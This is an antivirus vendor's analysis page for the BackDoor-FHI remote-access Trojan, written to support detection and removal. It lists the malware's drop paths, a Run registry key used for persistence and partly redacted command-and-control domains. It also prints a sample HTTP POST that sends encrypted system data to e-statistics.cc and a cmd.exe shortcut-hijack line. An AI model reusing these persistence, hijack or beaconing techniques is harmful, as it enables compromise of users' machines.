Intel Security
open

BackDoor-FHI

This page shows details and results of our analysis on the malware BackDoor-FHI

Download Current DAT

Threat Detail

  • Malware Type: Trojan
  • Malware Sub-type: Remote Access
  • Protection Added: 2012-08-03

This is a Trojan detection. Unlike viruses, Trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include e-mail, malicious or hacked Web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.

Aliases:

  • Microsoft - Backdoor:Win32/Caphaw.K
  • TrendMicro - BKDR_KATSLO.AA


Minimum Engine

5600.1067

File Length

Varies

Description Added

2012-08-03

Description Modified

2012-08-29

Malware Proliferation

Upon execution, the Trojan drops itself to the following path.
%UserProfile%\Application Data\[random]\[random].exe

BackDoor-FHI will likewise drop copies of itself in random areas as thumbs.db[random character].

The following registry keys has been added to the system to allow it to automatically execute at startup:

 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
"{8DF9EE17-84FF-E9C9-901F-18FC59A5DB1E}" = %UserProfile%\Application Data\[Random]\ [random].exe /r

The Trojan injects its own code in many random processes, and tries to connect to the following malicious hosts.

  • www.g[Removed]ard.su
  • www.pro[Removed]ection.su
  • www.e[Removed]statics.cc
  • so[Removed]esytems.cc
  • www-pro[Removed]ection.su
  • esto[Removed]e-main.su

Notes: The above mentioned URLs might change depending on geographical locations where malicious content is executed.

The malware posts some encrypted system information data to the sites above.

POST /ping.html HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705)
Host: e-statistics.cc
Content-Length: 9948
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
z=P8lvsmpmwVyY7lLJAnK60TUizGDXSdB9PCBKdUVwmflUQl6nsv5IIm7uuT7o7h ...

The malware may also add or infect current document lnk files using a format similar to the below:

  • /C start cmd.exe /C if exist \path\to\thumbs.dbF start \path\to\thumbs.dbF && start ""  "OriginalApp.exe"

The malware will then open the copy prior to opening the original target.

This Trojan is designed to download the malicious contents from websites and infect the comprised system.

Presence of above mentioned activities.

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, email spam, etc.

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system Registry and/or INI files for the purposes of hooking system startup, will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).